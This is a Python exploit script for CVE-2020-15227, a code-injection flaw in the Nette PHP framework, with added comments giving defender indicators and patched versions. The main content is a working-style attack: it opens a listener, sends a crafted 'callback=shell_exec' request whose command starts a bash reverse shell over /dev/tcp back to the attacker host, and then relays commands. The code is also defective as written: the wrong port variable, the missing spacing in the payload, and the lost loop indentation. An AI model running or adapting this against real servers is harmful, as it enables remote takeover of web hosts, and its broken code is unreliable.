exploit-CVE-2020-15227.py
#!/usr/bin/python
# author: @fr0z3nsp4z3
#
# Packages nette/application versions prior to 2.2.10, 2.3.14, 2.4.16, 3.0.6
# and nette/nette versions prior to 2.0.19 and 2.1.13 are vulnerable to a
# code injection attack: specially formed URL parameters may lead to RCE.
#
# Reported by Cyku Hong from DEVCORE (https://devco.re)
#
# Impact
# Code injection, possible remote code execution.
#
# Patches
# Fixed in nette/application 2.2.10, 2.3.14, 2.4.16, 3.0.6 and nette/nette 2.0.19 and 2.1.13
import sys
import socket
from urllib import request
import argparse
import pyfiglet
# Proof-of-concept script for CVE-2020-15227 (code injection in Nette).
# Flow as written: print a banner, parse four positional arguments, open a
# TCP listener, send one crafted GET request to the target, then relay typed
# commands over the accepted connection.
#
# Defender notes:
# - The request built below targets the path `/nette.micro` and carries a
#   `callback` query parameter naming a PHP function (`shell_exec`) plus a
#   `cmd` parameter. Requests of that shape in web-server access logs or WAF
#   telemetry are the indicator to search for.
# - The `cmd` value starts an interactive bash redirected to `/dev/tcp/...`,
#   so on the host side the web-server account spawning `bash -i` with an
#   outbound TCP connection is a second signal.
# - Remediation is upgrading to nette/application 2.2.10, 2.3.14, 2.4.16 or
#   3.0.6, or nette/nette 2.0.19 or 2.1.13 (the fixed releases named on this
#   page).
# NOTE(review): the script has defects as written and is not a reliable check
# of whether a host is affected; confirm exposure from the installed package
# versions instead.

# Banner output only; no functional effect.
print(pyfiglet.figlet_format('EXPLOITED BY'))
print(pyfiglet.figlet_format('FR0Z3NSP4Z3'))
# Four required positional arguments. nargs='+' makes each parsed value a
# list, which is why the values are indexed with [0] below.
parser = argparse.ArgumentParser(description='CVE-2020-15227 exploit by fr0z3nsp4z3')
parser.add_argument('url', metavar='url', nargs='+', help='Victim web URL formated as http|s://domain.com')
parser.add_argument('port', metavar='port', nargs='+', help='Victim web service port')
parser.add_argument('lhost', metavar='lhost', nargs='+', help='Attacker box IP|domain')
parser.add_argument('lport', metavar='lport', nargs='+', help='Attacker box port')
# Rebinds sys.argv to the parsed Namespace object instead of using a local name.
sys.argv = parser.parse_args()
# Take the first item of the parsed lists; all values are still strings here.
url = sys.argv.url[0]
port = sys.argv.port[0]
lhost = sys.argv.lhost[0]
lport = sys.argv.port[0]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # IPv4 TCP socket used as the listener
s.bind((lhost, lport)) # bind the listener to the supplied local address and port
s.listen(1) # backlog of 1: only a single inbound connection from a single
# target is expected
# The port number in this message is fixed text, not the configured value.
print('[+] Listening for incoming TCP connection on port 9999')
# accept() blocks until a peer connects to the listener.
conn, addr = s.accept()
# The crafted GET request: path `/nette.micro`, `callback=shell_exec`, and a
# `cmd` value built by plain string concatenation of lhost/lport. The response
# object `r` is not read afterwards.
r = request.urlopen(url+':'+port+'/nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1')
print('[+] We got a connection from: ', addr)
# Relay loop: one line of operator input per iteration, one recv() of at most
# 1024 bytes printed back.
while True:
command = input() # Get user input and store it in command variable
if 'exit' in command: # Any input containing 'exit' closes the connection and ends the loop
conn.close()
break
else:
conn.send(bytes(command)) # Otherwise the input is sent over the connection
print(conn.recv(1024)) # and up to 1024 bytes of the reply are printed